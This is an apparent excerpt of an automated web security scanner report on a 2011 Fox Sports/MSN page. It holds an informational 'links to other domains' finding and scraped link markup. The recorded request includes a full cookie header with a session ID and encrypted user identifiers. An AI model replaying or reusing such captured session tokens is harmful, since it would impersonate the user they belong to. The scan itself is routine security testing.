<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsohio.com/01/03/11/Brewers-to-be-top-challenge-to-Reds-in-2/landing_reds.html?blockID=383908&amp;feedID=3724' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Big cheese');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Big cheese') });location.href=this.href;">
<div id="blurb_4" align="left" class="blurb">
...[SNIP]...
<!-- MLB - Story Page Promo -->

<a href="http://www.whatifsports.com/x.asp?r=678106&u=mlb-l">Play SimLeague Baseball ... Where Baseball History Comes Alive</a>
...[SNIP]...
<div class="fs-tune-in">

   
           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=9998e412-41ca-4568-90f0-53fed84d09dd&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=9998e412-41ca-4568-90f0-53fed84d09dd&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=4c0c6cac-d496-48ce-988a-92aec83dcb3f&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=4c0c6cac-d496-48ce-988a-92aec83dcb3f&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=dc932b39-3e36-45d0-ad4c-2698ef92d0f5&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=dc932b39-3e36-45d0-ad4c-2698ef92d0f5&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=89116f56-239a-418d-ac74-f8ca6c430be0&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=89116f56-239a-418d-ac74-f8ca6c430be0&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=4451c7ef-2554-469a-b7df-a89383f35fe3&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=4451c7ef-2554-469a-b7df-a89383f35fe3&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportsohio.com/01/07/11/Jocketty-knows-Renteria-well/landing.html?blockID=387013&amp;feedID=3724" title="Known commodity">
Known commodity
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportsohio.com/01/07/11/Jocketty-knows-Renteria-well/landing.html?blockID=387013&amp;feedID=3724" title="Known commodity"></a>
...[SNIP]...


   
<a href="http://mlbbuzz.yardbarker.com/blog/mlbbuzz/soriano_is_no_1_free_agent_available_who_wants_him/3924488" title="Buzz: Soriano is best free agent left, but who wants him?">Buzz: Soriano is best free agent left, but who wants him?</a>
...[SNIP]...


   
        <a href="http://mlbbuzz.yardbarker.com/blog/mlbbuzz/soriano_is_no_1_free_agent_available_who_wants_him/3924488" title="Buzz: Soriano is best free agent left, but who wants him?"></a>
...[SNIP]...
<div class="fs-page-banner-sliver">

   
           <a href="http://foxsports.seenon.com/?v=fox-sports_mlb&amp;ecid=PRF-SM-510012&amp;PA=FoxSportsWSChampsGiants_300X90 "><img src="http://static.foxsports.com/content/fscom/img/2010/11/01/world_series_300x90_01_20101101222146_0_0.JPG" alt=""/>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.15. http://msn.foxsports.com/morenews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /morenews

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /morenews?categoryId=0 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 214301
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=12
Date: Sat, 08 Jan 2011 01:20:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">